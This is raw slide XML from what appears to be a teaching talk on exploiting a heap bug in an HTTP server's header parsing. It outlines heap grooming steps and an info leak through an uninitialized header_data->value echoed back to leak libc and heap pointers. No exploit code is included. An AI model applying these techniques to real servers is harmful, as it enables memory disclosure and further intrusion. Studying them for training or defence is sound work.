              <a:t>Allocate ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>header_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with chunk from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>step 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the header for leak!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 6" descr="Madden NFL Mobile Deep Dive: Roster and Playbook Updates">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031EC726-290B-4E4F-8C7E-F9A18B635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904" y="2309247"/>
            <a:ext cx="4115638" cy="232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768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Leak Strategy #2</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1"/>
            <a:ext cx="6826772" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate &amp; free a bunch of chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header to start request again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>header_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with chunk from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>step 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the header for leak!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 6" descr="Madden NFL Mobile Deep Dive: Roster and Playbook Updates">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031EC726-290B-4E4F-8C7E-F9A18B635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12" y="2323877"/>
            <a:ext cx="4115638" cy="232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594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E5BA-16E7-DA4C-B148-60DD953B620E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209227" y="21076"/>
            <a:ext cx="8973033" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Header Value Inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parse_single_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="header_data-&gt;value is NEVER initialized properly">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{086CB70B-60EC-1549-A7ED-D99AFF1F5DD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="423778" y="2260792"/>
            <a:ext cx="7578994" cy="2088810"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2DBB7A2-A0D5-2A44-9929-CCCAD2E842D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675145" y="1437107"/>
            <a:ext cx="8142200" cy="2763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Sizes! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Value size is the same as the key size </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{125D61E4-4D36-09FC-F156-AB6564836C6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688654" y="3097438"/>
            <a:ext cx="30822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026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6F7E-05E9-C345-B137-DEB37E4C913A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="342900"/>
            <a:ext cx="2949178" cy="1200150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Half Science – Half Art</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15362" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E773A8D-A85C-1A42-B5C6-D35B8451D6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 b="8785"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3887391" y="740572"/>
            <a:ext cx="4629150" cy="3655219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E881E258-29A2-3B5B-5675-BD0141493A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="1543052"/>
            <a:ext cx="2949178" cy="2858691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Play around with it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What can I do to make this work? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2893155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Your Turn to Groom!</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1"/>
            <a:ext cx="6826772" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>unsorted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bin for pointers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Heap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>header_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with chunk from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>step 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the header for leak!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 6" descr="Madden NFL Mobile Deep Dive: Roster and Playbook Updates">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031EC726-290B-4E4F-8C7E-F9A18B635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904" y="2309247"/>
            <a:ext cx="4115638" cy="232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250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developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F65CD49-95C3-8040-94AF-14F3D62DE9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580" b="11736"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2571750"/>
            <a:ext cx="8237687" cy="19844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36EB65-ACBC-554A-A92C-DB73DFD8CCBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP – Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404A6106-56F7-534D-8073-4A7424D1ADF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conveys additional information to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Type of data being sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The location to which the request is being made to</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3035013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75A08FE-B89C-5F0A-09E0-1176B8349E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="342900"/>
            <a:ext cx="2949178" cy="1200150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thought #1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Value pointer next to top chunk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D52BF36-2F90-8948-878C-BB67E9077FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3887391" y="924184"/>
            <a:ext cx="4629150" cy="3287994"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C6FF03F-3CBE-A8B3-2F98-A1C1EE9A3355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="1543052"/>
            <a:ext cx="2949178" cy="2858691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Header_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>next to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top_chunk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D83D44-7E14-E74A-84C8-3DE1C6EBE7F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4119963"/>
            <a:ext cx="211288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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C27DA30-C10A-DC44-9BAB-0B2B2A4D61F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4786544" y="1617940"/>
            <a:ext cx="211288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4733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75A08FE-B89C-5F0A-09E0-1176B8349E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="342900"/>
            <a:ext cx="2949178" cy="1200150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C6FF03F-3CBE-A8B3-2F98-A1C1EE9A3355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="1543052"/>
            <a:ext cx="4279510" cy="2858691"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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Can’t use TCache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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Want </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
